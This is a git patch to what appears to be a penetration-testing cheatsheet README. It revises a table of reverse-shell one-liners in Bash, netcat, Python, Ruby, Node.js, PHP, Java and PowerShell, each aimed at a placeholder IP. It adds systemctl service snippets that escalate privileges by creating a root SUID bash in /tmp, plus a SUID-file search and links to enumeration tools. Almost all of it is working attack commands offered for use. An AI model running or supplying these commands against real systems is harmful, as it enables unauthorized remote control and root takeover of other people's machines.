From 26eabd49259daa2de37a1f01d6094a86705f1dfa Mon Sep 17 00:00:00 2001
From: Phil <phil@nncltech.org>
Date: Tue, 28 Dec 2021 16:51:40 +0000
Subject: [PATCH] Added quick SUID to Cheatsheet

---
 README.md | 70 +++++++++++++++++++++++++++++++++++++++++++------------
 1 file changed, 55 insertions(+), 15 deletions(-)

diff --git a/README.md b/README.md
index 12ce723..8e87700 100644
--- a/README.md
+++ b/README.md
@@ -331,19 +331,19 @@ function printit ($string) {
 
 | Program | Command |
 |----------|---------|
-| Netcat Listen | ncat -vlnp 4444 |
+| Netcat Listen | ncat -lvnp 4444 |
 | Bash | bash -i >& /dev/tcp/IP/4444 0>&1 |
 | Bash | bash -c 'bash -i >& /dev/tcp/IP/4444 0>&1' |
-| PHP | php -r '$sock=fsockopen("^IP^",5566);exec("/bin/sh -i <&3 >&3 2>&3");'` | 
-| Netcat Connect | nc -e /bin/sh ^IP^ 5566`|
-| Telnet | mknod backpipe p && telnet ^IP^ 5566 0<backpipe | /bin/bash 1>backpipe` |
-| Python | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",5566));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'` |
-| Ruby | ruby -rsocket -e 'exit if fork;c=TCPSocket.new("^IP^","5566");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'` |
-| Node.js |  var net = require("net"), sh = require("child_process").exec("/bin/bash"); var client = new net.Socket(); client.connect(5566, "^IP^", function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);}); |
-|  | require('child_process').exec("bash -c 'bash -i >& /dev/tcp/^IP^/5566 0>&1'");` |
+| PHP | php -r '$sock=fsockopen("^IP^",4444);exec("/bin/sh -i <&3 >&3 2>&3");'` | 
+| Netcat Connect | nc -e /bin/sh ^IP^ 4444`|
+| Telnet | mknod backpipe p && telnet ^IP^ 4444 0<backpipe | /bin/bash 1>backpipe` |
+| Python | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'` |
+| Ruby | ruby -rsocket -e 'exit if fork;c=TCPSocket.new("^IP^","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'` |
+| Node.js |  var net = require("net"), sh = require("child_process").exec("/bin/bash"); var client = new net.Socket(); client.connect(4444, "^IP^", function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);}); |
+|  | require('child_process').exec("bash -c 'bash -i >& /dev/tcp/^IP^/4444 0>&1'");` |
 | Java | Runtime r = Runtime.getRuntime();Process p = r.exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/IP/4444;cat <&5 | while read line; do $line 2>&5 >&5; done"});p.waitFor();` |
 | Java | java.lang.Runtime.exec()` payload generator: http://www.jackson-t.ca/runtime-exec-payloads.html |
-| Powershell |  powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ^IP^ -p 5566 -e cmd |
+| Powershell |  powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ^IP^ -p 4444 -e cmd |
 
 
 
@@ -392,7 +392,7 @@ export TERM=xterm
 
 ### Lets Have a Look Around
 
-* PEASS-ng
+##### PEASS-ng
 
 | OS | Links |
 |----|------|
@@ -400,15 +400,55 @@ export TERM=xterm
 | Windows x68 | https://github.com/carlospolop/PEASS-ng/raw/master/winPEAS/winPEASexe/binaries/x64/Release/winPEASx64.exe |
 |Windows x86 | https://github.com/carlospolop/PEASS-ng/raw/master/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe |
 
-* GTFObins
-
-> https://gtfobins.github.io/
 
 
-* Linux Tools
+### Escalate Privileges
+
+
+##### SUID
+
+* Find SUID Files
 | Command| Discription |
 |--------|-------------|
-| find / -type f -user root -perm -4000 2>/dev/null | Find SUID Files |
+| find / -user root -perm -4000 2>/dev/null | Find SUID Files |
+
+
+* SUID Cheatsheet
+  * systemctl
+```
+cd /tmp
+TF=$(mktemp).service
+echo '[Service]
+Type=oneshot
+ExecStart=/bin/sh -c "COMMAND HERE"
+[Install]
+WantedBy=multi-user.target' > $TF
+systemctl link $TF
+systemctl enable --now $TF
+```
+   * Create a Service that will give `/bin/bash` a Root SUID
+```
+cd /tmp
+TF=$(mktemp).service
+echo '[Service]
+Type=oneshot
+ExecStart=/bin/sh -c "cp /bin/bash /tmp/bash;chmod +s /tmp/bash"
+[Install]
+WantedBy=multi-user.target' > $TF
+systemctl link $TF
+systemctl enable --now $TF
+/tmp/bash -p
+```
+
+
+Search [GTFO Bins](https://gtfobins.github.io/) for exploits
+
+
+
+
+##### Linux Tools
+
+